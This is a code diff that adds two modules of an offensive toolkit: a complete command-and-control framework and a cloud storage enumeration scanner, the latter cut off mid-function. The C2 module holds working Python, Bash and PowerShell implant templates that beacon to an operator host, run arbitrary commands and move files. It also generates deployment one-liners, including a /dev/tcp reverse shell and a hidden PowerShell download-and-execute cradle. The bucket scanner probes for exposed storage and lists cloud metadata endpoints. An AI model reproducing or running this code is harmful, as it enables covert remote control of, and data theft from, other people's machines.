modules/c2_framework.py
Normal file
@ -0,0 +1,610 @@
|
||||
"""AUTARCH C2 Framework
|
||||
|
||||
Multi-session command & control framework with agent generation,
|
||||
listener management, task queuing, and file transfer.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Command & Control framework"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import socket
|
||||
import base64
|
||||
import secrets
|
||||
import threading
|
||||
import struct
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Agent Templates ───────────────────────────────────────────────────────────
|
||||
|
||||
PYTHON_AGENT_TEMPLATE = '''#!/usr/bin/env python3
|
||||
"""AUTARCH C2 Agent — auto-generated."""
|
||||
import os,sys,time,socket,subprocess,json,base64,platform,random
|
||||
C2_HOST="{host}"
|
||||
C2_PORT={port}
|
||||
BEACON_INTERVAL={interval}
|
||||
JITTER={jitter}
|
||||
AGENT_ID="{agent_id}"
|
||||
|
||||
def beacon():
|
||||
while True:
|
||||
try:
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.settimeout(30)
|
||||
s.connect((C2_HOST,C2_PORT))
|
||||
# Register
|
||||
info={{"id":AGENT_ID,"os":platform.system(),"hostname":socket.gethostname(),
|
||||
"user":os.getenv("USER",os.getenv("USERNAME","unknown")),
|
||||
"pid":os.getpid(),"arch":platform.machine()}}
|
||||
s.send(json.dumps({{"type":"register","data":info}}).encode()+"\\n".encode())
|
||||
while True:
|
||||
data=s.recv(65536)
|
||||
if not data:break
|
||||
try:
|
||||
cmd=json.loads(data.decode())
|
||||
result=handle_cmd(cmd)
|
||||
s.send(json.dumps(result).encode()+"\\n".encode())
|
||||
except:pass
|
||||
except:pass
|
||||
finally:
|
||||
try:s.close()
|
||||
except:pass
|
||||
jitter_delay=BEACON_INTERVAL+random.uniform(-JITTER,JITTER)
|
||||
time.sleep(max(1,jitter_delay))
|
||||
|
||||
def handle_cmd(cmd):
|
||||
t=cmd.get("type","")
|
||||
if t=="exec":
|
||||
try:
|
||||
r=subprocess.run(cmd["command"],shell=True,capture_output=True,text=True,timeout=60)
|
||||
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":r.stdout[-4096:],"stderr":r.stderr[-2048:],"rc":r.returncode}}
|
||||
except Exception as e:
|
||||
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
|
||||
elif t=="download":
|
||||
try:
|
||||
with open(cmd["path"],"rb") as f:d=base64.b64encode(f.read()).decode()
|
||||
return{{"type":"file","task_id":cmd.get("task_id",""),"name":os.path.basename(cmd["path"]),"data":d}}
|
||||
except Exception as e:
|
||||
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
|
||||
elif t=="upload":
|
||||
try:
|
||||
with open(cmd["path"],"wb") as f:f.write(base64.b64decode(cmd["data"]))
|
||||
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":"Uploaded to "+cmd["path"]}}
|
||||
except Exception as e:
|
||||
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
|
||||
elif t=="sysinfo":
|
||||
return{{"type":"result","task_id":cmd.get("task_id",""),
|
||||
"stdout":json.dumps({{"os":platform.system(),"release":platform.release(),
|
||||
"hostname":socket.gethostname(),"user":os.getenv("USER",os.getenv("USERNAME","")),
|
||||
"pid":os.getpid(),"cwd":os.getcwd(),"arch":platform.machine()}})}}
|
||||
elif t=="exit":
|
||||
sys.exit(0)
|
||||
return{{"type":"error","task_id":cmd.get("task_id",""),"error":"Unknown command"}}
|
||||
|
||||
if __name__=="__main__":beacon()
|
||||
'''
|
||||
|
||||
BASH_AGENT_TEMPLATE = '''#!/bin/bash
|
||||
# AUTARCH C2 Agent — auto-generated
|
||||
C2_HOST="{host}"
|
||||
C2_PORT={port}
|
||||
INTERVAL={interval}
|
||||
AGENT_ID="{agent_id}"
|
||||
while true; do
|
||||
exec 3<>/dev/tcp/$C2_HOST/$C2_PORT 2>/dev/null
|
||||
if [ $? -eq 0 ]; then
|
||||
echo '{{"type":"register","data":{{"id":"'$AGENT_ID'","os":"'$(uname -s)'","hostname":"'$(hostname)'","user":"'$(whoami)'","pid":'$$'}}}}' >&3
|
||||
while read -r line <&3; do
|
||||
CMD=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('command',''))" 2>/dev/null)
|
||||
TID=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('task_id',''))" 2>/dev/null)
|
||||
if [ -n "$CMD" ]; then
|
||||
OUTPUT=$(eval "$CMD" 2>&1 | head -c 4096)
|
||||
echo '{{"type":"result","task_id":"'$TID'","stdout":"'$(echo "$OUTPUT" | base64 -w0)'"}}' >&3
|
||||
fi
|
||||
done
|
||||
exec 3>&-
|
||||
fi
|
||||
sleep $INTERVAL
|
||||
done
|
||||
'''
|
||||
|
||||
POWERSHELL_AGENT_TEMPLATE = '''# AUTARCH C2 Agent — auto-generated
|
||||
$C2Host="{host}"
|
||||
$C2Port={port}
|
||||
$Interval={interval}
|
||||
$AgentId="{agent_id}"
|
||||
while($true){{
|
||||
try{{
|
||||
$c=New-Object System.Net.Sockets.TcpClient($C2Host,$C2Port)
|
||||
$s=$c.GetStream()
|
||||
$w=New-Object System.IO.StreamWriter($s)
|
||||
$r=New-Object System.IO.StreamReader($s)
|
||||
$info=@{{type="register";data=@{{id=$AgentId;os="Windows";hostname=$env:COMPUTERNAME;user=$env:USERNAME;pid=$PID}}}}|ConvertTo-Json -Compress
|
||||
$w.WriteLine($info);$w.Flush()
|
||||
while($c.Connected){{
|
||||
$line=$r.ReadLine()
|
||||
if($line){{
|
||||
$cmd=$line|ConvertFrom-Json
|
||||
if($cmd.type -eq "exec"){{
|
||||
try{{$out=Invoke-Expression $cmd.command 2>&1|Out-String
|
||||
$resp=@{{type="result";task_id=$cmd.task_id;stdout=$out.Substring(0,[Math]::Min($out.Length,4096))}}|ConvertTo-Json -Compress
|
||||
}}catch{{$resp=@{{type="error";task_id=$cmd.task_id;error=$_.Exception.Message}}|ConvertTo-Json -Compress}}
|
||||
$w.WriteLine($resp);$w.Flush()
|
||||
}}
|
||||
}}
|
||||
}}
|
||||
}}catch{{}}
|
||||
Start-Sleep -Seconds $Interval
|
||||
}}
|
||||
'''
|
||||
|
||||
|
||||
# ── C2 Server ─────────────────────────────────────────────────────────────────
|
||||
|
||||
@dataclass
|
||||
class Agent:
|
||||
id: str
|
||||
os: str = ''
|
||||
hostname: str = ''
|
||||
user: str = ''
|
||||
pid: int = 0
|
||||
arch: str = ''
|
||||
remote_addr: str = ''
|
||||
first_seen: str = ''
|
||||
last_seen: str = ''
|
||||
status: str = 'active' # active, stale, dead
|
||||
|
||||
|
||||
@dataclass
|
||||
class Task:
|
||||
id: str
|
||||
agent_id: str
|
||||
type: str
|
||||
data: dict = field(default_factory=dict)
|
||||
status: str = 'pending' # pending, sent, completed, failed
|
||||
result: Optional[dict] = None
|
||||
created_at: str = ''
|
||||
completed_at: str = ''
|
||||
|
||||
|
||||
class C2Server:
|
||||
"""Multi-session C2 server with agent management."""
|
||||
|
||||
def __init__(self):
|
||||
self._data_dir = os.path.join(get_data_dir(), 'c2')
|
||||
os.makedirs(self._data_dir, exist_ok=True)
|
||||
self._agents: Dict[str, Agent] = {}
|
||||
self._tasks: Dict[str, Task] = {}
|
||||
self._agent_tasks: Dict[str, list] = {} # agent_id -> [task_ids]
|
||||
self._agent_sockets: Dict[str, socket.socket] = {}
|
||||
self._listeners: Dict[str, dict] = {}
|
||||
self._listener_threads: Dict[str, threading.Thread] = {}
|
||||
self._stop_events: Dict[str, threading.Event] = {}
|
||||
|
||||
# ── Listener Management ───────────────────────────────────────────────
|
||||
|
||||
def start_listener(self, name: str, host: str = '0.0.0.0',
|
||||
port: int = 4444, protocol: str = 'tcp') -> dict:
|
||||
"""Start a C2 listener."""
|
||||
if name in self._listeners:
|
||||
return {'ok': False, 'error': f'Listener "{name}" already exists'}
|
||||
|
||||
stop_event = threading.Event()
|
||||
self._stop_events[name] = stop_event
|
||||
|
||||
listener_info = {
|
||||
'name': name, 'host': host, 'port': port, 'protocol': protocol,
|
||||
'started_at': datetime.now(timezone.utc).isoformat(),
|
||||
'connections': 0,
|
||||
}
|
||||
self._listeners[name] = listener_info
|
||||
|
||||
def accept_loop():
|
||||
try:
|
||||
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
srv.settimeout(2.0)
|
||||
srv.bind((host, port))
|
||||
srv.listen(20)
|
||||
listener_info['socket'] = srv
|
||||
|
||||
while not stop_event.is_set():
|
||||
try:
|
||||
conn, addr = srv.accept()
|
||||
listener_info['connections'] += 1
|
||||
threading.Thread(target=self._handle_agent,
|
||||
args=(conn, addr, name),
|
||||
daemon=True).start()
|
||||
except socket.timeout:
|
||||
continue
|
||||
except Exception:
|
||||
break
|
||||
except Exception as e:
|
||||
listener_info['error'] = str(e)
|
||||
finally:
|
||||
try:
|
||||
srv.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
t = threading.Thread(target=accept_loop, daemon=True)
|
||||
t.start()
|
||||
self._listener_threads[name] = t
|
||||
|
||||
return {'ok': True, 'message': f'Listener "{name}" started on {host}:{port}'}
|
||||
|
||||
def stop_listener(self, name: str) -> dict:
|
||||
"""Stop a C2 listener."""
|
||||
if name not in self._listeners:
|
||||
return {'ok': False, 'error': 'Listener not found'}
|
||||
stop_event = self._stop_events.pop(name, None)
|
||||
if stop_event:
|
||||
stop_event.set()
|
||||
listener = self._listeners.pop(name, {})
|
||||
sock = listener.get('socket')
|
||||
if sock:
|
||||
try:
|
||||
sock.close()
|
||||
except Exception:
|
||||
pass
|
||||
self._listener_threads.pop(name, None)
|
||||
return {'ok': True, 'message': f'Listener "{name}" stopped'}
|
||||
|
||||
def list_listeners(self) -> List[dict]:
|
||||
return [{k: v for k, v in l.items() if k != 'socket'}
|
||||
for l in self._listeners.values()]
|
||||
|
||||
def _handle_agent(self, conn: socket.socket, addr: tuple, listener: str):
|
||||
"""Handle incoming agent connection."""
|
||||
conn.settimeout(300) # 5 min timeout
|
||||
try:
|
||||
data = conn.recv(65536)
|
||||
if not data:
|
||||
return
|
||||
msg = json.loads(data.decode().strip())
|
||||
if msg.get('type') != 'register':
|
||||
conn.close()
|
||||
return
|
||||
|
||||
info = msg.get('data', {})
|
||||
agent_id = info.get('id', secrets.token_hex(4))
|
||||
|
||||
agent = Agent(
|
||||
id=agent_id,
|
||||
os=info.get('os', ''),
|
||||
hostname=info.get('hostname', ''),
|
||||
user=info.get('user', ''),
|
||||
pid=info.get('pid', 0),
|
||||
arch=info.get('arch', ''),
|
||||
remote_addr=f'{addr[0]}:{addr[1]}',
|
||||
first_seen=datetime.now(timezone.utc).isoformat(),
|
||||
last_seen=datetime.now(timezone.utc).isoformat(),
|
||||
)
|
||||
|
||||
self._agents[agent_id] = agent
|
||||
self._agent_sockets[agent_id] = conn
|
||||
if agent_id not in self._agent_tasks:
|
||||
self._agent_tasks[agent_id] = []
|
||||
|
||||
# Process pending tasks for this agent
|
||||
while True:
|
||||
pending = [t for t in self._get_pending_tasks(agent_id)]
|
||||
if not pending:
|
||||
time.sleep(1)
|
||||
# Check if still connected
|
||||
try:
|
||||
conn.send(b'')
|
||||
except Exception:
|
||||
break
|
||||
agent.last_seen = datetime.now(timezone.utc).isoformat()
|
||||
continue
|
||||
|
||||
for task in pending:
|
||||
try:
|
||||
cmd = {'type': task.type, 'task_id': task.id, **task.data}
|
||||
conn.send(json.dumps(cmd).encode() + b'\n')
|
||||
task.status = 'sent'
|
||||
|
||||
# Wait for result
|
||||
conn.settimeout(60)
|
||||
result_data = conn.recv(65536)
|
||||
if result_data:
|
||||
result = json.loads(result_data.decode().strip())
|
||||
task.result = result
|
||||
task.status = 'completed'
|
||||
task.completed_at = datetime.now(timezone.utc).isoformat()
|
||||
else:
|
||||
task.status = 'failed'
|
||||
except Exception as e:
|
||||
task.status = 'failed'
|
||||
task.result = {'error': str(e)}
|
||||
|
||||
agent.last_seen = datetime.now(timezone.utc).isoformat()
|
||||
|
||||
except Exception:
|
||||
pass
|
||||
finally:
|
||||
conn.close()
|
||||
# Mark agent as stale if no longer connected
|
||||
for aid, sock in list(self._agent_sockets.items()):
|
||||
if sock is conn:
|
||||
self._agent_sockets.pop(aid, None)
|
||||
if aid in self._agents:
|
||||
self._agents[aid].status = 'stale'
|
||||
|
||||
def _get_pending_tasks(self, agent_id: str) -> List[Task]:
|
||||
task_ids = self._agent_tasks.get(agent_id, [])
|
||||
return [self._tasks[tid] for tid in task_ids
|
||||
if tid in self._tasks and self._tasks[tid].status == 'pending']
|
||||
|
||||
# ── Agent Management ──────────────────────────────────────────────────
|
||||
|
||||
def list_agents(self) -> List[dict]:
|
||||
agents = []
|
||||
for a in self._agents.values():
|
||||
# Check if still connected
|
||||
connected = a.id in self._agent_sockets
|
||||
agents.append({
|
||||
'id': a.id, 'os': a.os, 'hostname': a.hostname,
|
||||
'user': a.user, 'pid': a.pid, 'arch': a.arch,
|
||||
'remote_addr': a.remote_addr,
|
||||
'first_seen': a.first_seen, 'last_seen': a.last_seen,
|
||||
'status': 'active' if connected else a.status,
|
||||
})
|
||||
return agents
|
||||
|
||||
def remove_agent(self, agent_id: str) -> dict:
|
||||
if agent_id in self._agent_sockets:
|
||||
try:
|
||||
self._agent_sockets[agent_id].close()
|
||||
except Exception:
|
||||
pass
|
||||
del self._agent_sockets[agent_id]
|
||||
self._agents.pop(agent_id, None)
|
||||
self._agent_tasks.pop(agent_id, None)
|
||||
return {'ok': True}
|
||||
|
||||
# ── Task Queue ────────────────────────────────────────────────────────
|
||||
|
||||
def queue_task(self, agent_id: str, task_type: str,
|
||||
data: dict = None) -> dict:
|
||||
"""Queue a task for an agent."""
|
||||
if agent_id not in self._agents:
|
||||
return {'ok': False, 'error': 'Agent not found'}
|
||||
|
||||
task_id = secrets.token_hex(4)
|
||||
task = Task(
|
||||
id=task_id,
|
||||
agent_id=agent_id,
|
||||
type=task_type,
|
||||
data=data or {},
|
||||
created_at=datetime.now(timezone.utc).isoformat(),
|
||||
)
|
||||
self._tasks[task_id] = task
|
||||
if agent_id not in self._agent_tasks:
|
||||
self._agent_tasks[agent_id] = []
|
||||
self._agent_tasks[agent_id].append(task_id)
|
||||
|
||||
return {'ok': True, 'task_id': task_id}
|
||||
|
||||
def execute_command(self, agent_id: str, command: str) -> dict:
|
||||
"""Shortcut to queue an exec task."""
|
||||
return self.queue_task(agent_id, 'exec', {'command': command})
|
||||
|
||||
def download_file(self, agent_id: str, remote_path: str) -> dict:
|
||||
return self.queue_task(agent_id, 'download', {'path': remote_path})
|
||||
|
||||
def upload_file(self, agent_id: str, remote_path: str,
|
||||
file_data: bytes) -> dict:
|
||||
encoded = base64.b64encode(file_data).decode()
|
||||
return self.queue_task(agent_id, 'upload',
|
||||
{'path': remote_path, 'data': encoded})
|
||||
|
||||
def get_task_result(self, task_id: str) -> dict:
|
||||
task = self._tasks.get(task_id)
|
||||
if not task:
|
||||
return {'ok': False, 'error': 'Task not found'}
|
||||
return {
|
||||
'ok': True,
|
||||
'task_id': task.id,
|
||||
'status': task.status,
|
||||
'result': task.result,
|
||||
'created_at': task.created_at,
|
||||
'completed_at': task.completed_at,
|
||||
}
|
||||
|
||||
def list_tasks(self, agent_id: str = '') -> List[dict]:
|
||||
tasks = []
|
||||
for t in self._tasks.values():
|
||||
if agent_id and t.agent_id != agent_id:
|
||||
continue
|
||||
tasks.append({
|
||||
'id': t.id, 'agent_id': t.agent_id, 'type': t.type,
|
||||
'status': t.status, 'created_at': t.created_at,
|
||||
'completed_at': t.completed_at,
|
||||
'has_result': t.result is not None,
|
||||
})
|
||||
return tasks
|
||||
|
||||
# ── Agent Generation ──────────────────────────────────────────────────
|
||||
|
||||
def generate_agent(self, host: str, port: int = 4444,
|
||||
agent_type: str = 'python',
|
||||
interval: int = 5, jitter: int = 2) -> dict:
|
||||
"""Generate a C2 agent payload."""
|
||||
agent_id = secrets.token_hex(4)
|
||||
|
||||
if agent_type == 'python':
|
||||
code = PYTHON_AGENT_TEMPLATE.format(
|
||||
host=host, port=port, interval=interval,
|
||||
jitter=jitter, agent_id=agent_id)
|
||||
elif agent_type == 'bash':
|
||||
code = BASH_AGENT_TEMPLATE.format(
|
||||
host=host, port=port, interval=interval,
|
||||
agent_id=agent_id)
|
||||
elif agent_type == 'powershell':
|
||||
code = POWERSHELL_AGENT_TEMPLATE.format(
|
||||
host=host, port=port, interval=interval,
|
||||
agent_id=agent_id)
|
||||
else:
|
||||
return {'ok': False, 'error': f'Unknown agent type: {agent_type}'}
|
||||
|
||||
# Save to file
|
||||
ext = {'python': 'py', 'bash': 'sh', 'powershell': 'ps1'}[agent_type]
|
||||
filename = f'agent_{agent_id}.{ext}'
|
||||
filepath = os.path.join(self._data_dir, filename)
|
||||
with open(filepath, 'w') as f:
|
||||
f.write(code)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'agent_id': agent_id,
|
||||
'filename': filename,
|
||||
'filepath': filepath,
|
||||
'code': code,
|
||||
'type': agent_type,
|
||||
}
|
||||
|
||||
# ── One-liners ────────────────────────────────────────────────────────
|
||||
|
||||
def get_oneliner(self, host: str, port: int = 4444,
|
||||
agent_type: str = 'python') -> dict:
|
||||
"""Generate a one-liner to deploy the agent."""
|
||||
if agent_type == 'python':
|
||||
liner = (f"python3 -c \"import urllib.request,os,tempfile;"
|
||||
f"f=tempfile.NamedTemporaryFile(suffix='.py',delete=False);"
|
||||
f"f.write(urllib.request.urlopen('http://{host}:{port+1}/agent.py').read());"
|
||||
f"f.close();os.system('python3 '+f.name+' &')\"")
|
||||
elif agent_type == 'bash':
|
||||
liner = f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1 &'"
|
||||
elif agent_type == 'powershell':
|
||||
liner = (f"powershell -nop -w hidden -c "
|
||||
f"\"IEX(New-Object Net.WebClient).DownloadString"
|
||||
f"('http://{host}:{port+1}/agent.ps1')\"")
|
||||
else:
|
||||
return {'ok': False, 'error': 'Unknown type'}
|
||||
|
||||
return {'ok': True, 'oneliner': liner, 'type': agent_type}
|
||||
|
||||
|
||||
# ── Singleton ─────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_c2_server() -> C2Server:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = C2Server()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI ───────────────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for C2 Framework."""
|
||||
svc = get_c2_server()
|
||||
|
||||
while True:
|
||||
print("\n╔═══════════════════════════════════════╗")
|
||||
print("║ C2 FRAMEWORK ║")
|
||||
print("╠═══════════════════════════════════════╣")
|
||||
print("║ 1 — Start Listener ║")
|
||||
print("║ 2 — Stop Listener ║")
|
||||
print("║ 3 — List Agents ║")
|
||||
print("║ 4 — Interact with Agent ║")
|
||||
print("║ 5 — Generate Agent Payload ║")
|
||||
print("║ 6 — Get One-Liner ║")
|
||||
print("║ 0 — Back ║")
|
||||
print("╚═══════════════════════════════════════╝")
|
||||
|
||||
choice = input("\n Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
name = input(" Listener name: ").strip() or 'default'
|
||||
port = int(input(" Port (4444): ").strip() or '4444')
|
||||
r = svc.start_listener(name, port=port)
|
||||
print(f" {r.get('message', r.get('error', ''))}")
|
||||
elif choice == '2':
|
||||
listeners = svc.list_listeners()
|
||||
if not listeners:
|
||||
print(" No listeners.")
|
||||
continue
|
||||
for l in listeners:
|
||||
print(f" {l['name']} — {l['host']}:{l['port']} ({l['connections']} connections)")
|
||||
name = input(" Stop which: ").strip()
|
||||
if name:
|
||||
r = svc.stop_listener(name)
|
||||
print(f" {r.get('message', r.get('error', ''))}")
|
||||
elif choice == '3':
|
||||
agents = svc.list_agents()
|
||||
if not agents:
|
||||
print(" No agents.")
|
||||
continue
|
||||
for a in agents:
|
||||
print(f" [{a['status']:6s}] {a['id']} — {a['user']}@{a['hostname']} "
|
||||
f"({a['os']}) from {a['remote_addr']}")
|
||||
elif choice == '4':
|
||||
aid = input(" Agent ID: ").strip()
|
||||
if not aid:
|
||||
continue
|
||||
print(f" Interacting with {aid} (type 'exit' to return)")
|
||||
while True:
|
||||
cmd = input(f" [{aid}]> ").strip()
|
||||
if cmd in ('exit', 'quit', ''):
|
||||
break
|
||||
r = svc.execute_command(aid, cmd)
|
||||
if not r.get('ok'):
|
||||
print(f" Error: {r.get('error')}")
|
||||
continue
|
||||
# Poll for result
|
||||
for _ in range(30):
|
||||
time.sleep(1)
|
||||
result = svc.get_task_result(r['task_id'])
|
||||
if result.get('status') in ('completed', 'failed'):
|
||||
if result.get('result'):
|
||||
out = result['result'].get('stdout', '')
|
||||
err = result['result'].get('stderr', '')
|
||||
if out:
|
||||
print(out)
|
||||
if err:
|
||||
print(f" [stderr] {err}")
|
||||
break
|
||||
else:
|
||||
print(" [timeout] No response within 30s")
|
||||
elif choice == '5':
|
||||
host = input(" Callback host: ").strip()
|
||||
port = int(input(" Callback port (4444): ").strip() or '4444')
|
||||
atype = input(" Type (python/bash/powershell): ").strip() or 'python'
|
||||
r = svc.generate_agent(host, port, atype)
|
||||
if r.get('ok'):
|
||||
print(f" Agent saved to: {r['filepath']}")
|
||||
else:
|
||||
print(f" Error: {r.get('error')}")
|
||||
elif choice == '6':
|
||||
host = input(" Host: ").strip()
|
||||
port = int(input(" Port (4444): ").strip() or '4444')
|
||||
atype = input(" Type (python/bash/powershell): ").strip() or 'python'
|
||||
r = svc.get_oneliner(host, port, atype)
|
||||
if r.get('ok'):
|
||||
print(f"\n {r['oneliner']}\n")
|
||||
448
modules/cloud_scan.py
Normal file
448
modules/cloud_scan.py
Normal file
@ -0,0 +1,448 @@
|
||||
"""AUTARCH Cloud Security Scanner
|
||||
|
||||
AWS/Azure/GCP bucket enumeration, IAM misconfiguration detection, exposed
|
||||
service scanning, and cloud resource discovery.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Cloud infrastructure security scanning"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
import requests
|
||||
HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
HAS_REQUESTS = False
|
||||
|
||||
|
||||
# ── Cloud Provider Endpoints ─────────────────────────────────────────────────
|
||||
|
||||
AWS_REGIONS = [
|
||||
'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2',
|
||||
'eu-west-1', 'eu-west-2', 'eu-central-1',
|
||||
'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1',
|
||||
]
|
||||
|
||||
COMMON_BUCKET_NAMES = [
|
||||
'backup', 'backups', 'data', 'dev', 'staging', 'prod', 'production',
|
||||
'logs', 'assets', 'media', 'uploads', 'images', 'static', 'public',
|
||||
'private', 'internal', 'config', 'configs', 'db', 'database',
|
||||
'archive', 'old', 'temp', 'tmp', 'test', 'debug', 'admin',
|
||||
'www', 'web', 'api', 'app', 'mobile', 'docs', 'documents',
|
||||
'reports', 'export', 'import', 'share', 'shared',
|
||||
]
|
||||
|
||||
METADATA_ENDPOINTS = {
|
||||
'aws': 'http://169.254.169.254/latest/meta-data/',
|
||||
'gcp': 'http://metadata.google.internal/computeMetadata/v1/',
|
||||
'azure': 'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
|
||||
'digitalocean': 'http://169.254.169.254/metadata/v1/',
|
||||
}
|
||||
|
||||
|
||||
# ── Cloud Scanner ────────────────────────────────────────────────────────────
|
||||
|
||||
class CloudScanner:
|
||||
"""Cloud infrastructure security scanner."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'cloud_scan')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.results: List[Dict] = []
|
||||
self._jobs: Dict[str, Dict] = {}
|
||||
|
||||
# ── S3 Bucket Enumeration ────────────────────────────────────────────
|
||||
|
||||
def enum_s3_buckets(self, keyword: str, prefixes: List[str] = None,
|
||||
suffixes: List[str] = None) -> str:
|
||||
"""Enumerate S3 buckets with naming permutations. Returns job_id."""
|
||||
if not HAS_REQUESTS:
|
||||
return ''
|
||||
|
||||
job_id = f's3enum_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 's3_enum', 'status': 'running',
|
||||
'found': [], 'checked': 0, 'total': 0
|
||||
}
|
||||
|
||||
def _enum():
|
||||
prefixes_list = prefixes or ['', 'dev-', 'staging-', 'prod-', 'test-', 'backup-']
|
||||
suffixes_list = suffixes or ['', '-backup', '-data', '-assets', '-logs', '-dev',
|
||||
'-staging', '-prod', '-public', '-private']
|
||||
|
||||
bucket_names = set()
|
||||
for pfx in prefixes_list:
|
||||
for sfx in suffixes_list:
|
||||
bucket_names.add(f'{pfx}{keyword}{sfx}')
|
||||
# Add common patterns
|
||||
for common in COMMON_BUCKET_NAMES:
|
||||
bucket_names.add(f'{keyword}-{common}')
|
||||
bucket_names.add(f'{common}-{keyword}')
|
||||
|
||||
self._jobs[job_id]['total'] = len(bucket_names)
|
||||
found = []
|
||||
|
||||
for name in bucket_names:
|
||||
try:
|
||||
# Check S3 bucket
|
||||
url = f'https://{name}.s3.amazonaws.com'
|
||||
resp = requests.head(url, timeout=5, allow_redirects=True)
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
if resp.status_code == 200:
|
||||
# Try listing
|
||||
list_resp = requests.get(url, timeout=5)
|
||||
listable = '<ListBucketResult' in list_resp.text
|
||||
|
||||
found.append({
|
||||
'bucket': name, 'provider': 'aws',
|
||||
'url': url, 'status': resp.status_code,
|
||||
'listable': listable, 'public': True
|
||||
})
|
||||
elif resp.status_code == 403:
|
||||
found.append({
|
||||
'bucket': name, 'provider': 'aws',
|
||||
'url': url, 'status': 403,
|
||||
'listable': False, 'public': False,
|
||||
'exists': True
|
||||
})
|
||||
except Exception:
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
self._jobs[job_id]['found'] = found
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
|
||||
threading.Thread(target=_enum, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── GCS Bucket Enumeration ───────────────────────────────────────────
|
||||
|
||||
def enum_gcs_buckets(self, keyword: str) -> str:
|
||||
"""Enumerate Google Cloud Storage buckets. Returns job_id."""
|
||||
if not HAS_REQUESTS:
|
||||
return ''
|
||||
|
||||
job_id = f'gcsenum_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'gcs_enum', 'status': 'running',
|
||||
'found': [], 'checked': 0, 'total': 0
|
||||
}
|
||||
|
||||
def _enum():
|
||||
names = set()
|
||||
for suffix in ['', '-data', '-backup', '-assets', '-staging', '-prod', '-dev', '-logs']:
|
||||
names.add(f'{keyword}{suffix}')
|
||||
|
||||
self._jobs[job_id]['total'] = len(names)
|
||||
found = []
|
||||
|
||||
for name in names:
|
||||
try:
|
||||
url = f'https://storage.googleapis.com/{name}'
|
||||
resp = requests.head(url, timeout=5)
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
if resp.status_code in (200, 403):
|
||||
found.append({
|
||||
'bucket': name, 'provider': 'gcp',
|
||||
'url': url, 'status': resp.status_code,
|
||||
'public': resp.status_code == 200
|
||||
})
|
||||
except Exception:
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
self._jobs[job_id]['found'] = found
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
|
||||
threading.Thread(target=_enum, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── Azure Blob Enumeration ───────────────────────────────────────────
|
||||
|
||||
def enum_azure_blobs(self, keyword: str) -> str:
|
||||
"""Enumerate Azure Blob Storage containers. Returns job_id."""
|
||||
if not HAS_REQUESTS:
|
||||
return ''
|
||||
|
||||
job_id = f'azureenum_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'azure_enum', 'status': 'running',
|
||||
'found': [], 'checked': 0, 'total': 0
|
||||
}
|
||||
|
||||
def _enum():
|
||||
# Storage account names
|
||||
accounts = [keyword, f'{keyword}storage', f'{keyword}data',
|
||||
f'{keyword}backup', f'{keyword}dev', f'{keyword}prod']
|
||||
containers = ['$web', 'data', 'backup', 'uploads', 'assets',
|
||||
'logs', 'public', 'media', 'images']
|
||||
|
||||
total = len(accounts) * len(containers)
|
||||
self._jobs[job_id]['total'] = total
|
||||
found = []
|
||||
|
||||
for account in accounts:
|
||||
for container in containers:
|
||||
try:
|
||||
url = f'https://{account}.blob.core.windows.net/{container}?restype=container&comp=list'
|
||||
resp = requests.get(url, timeout=5)
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
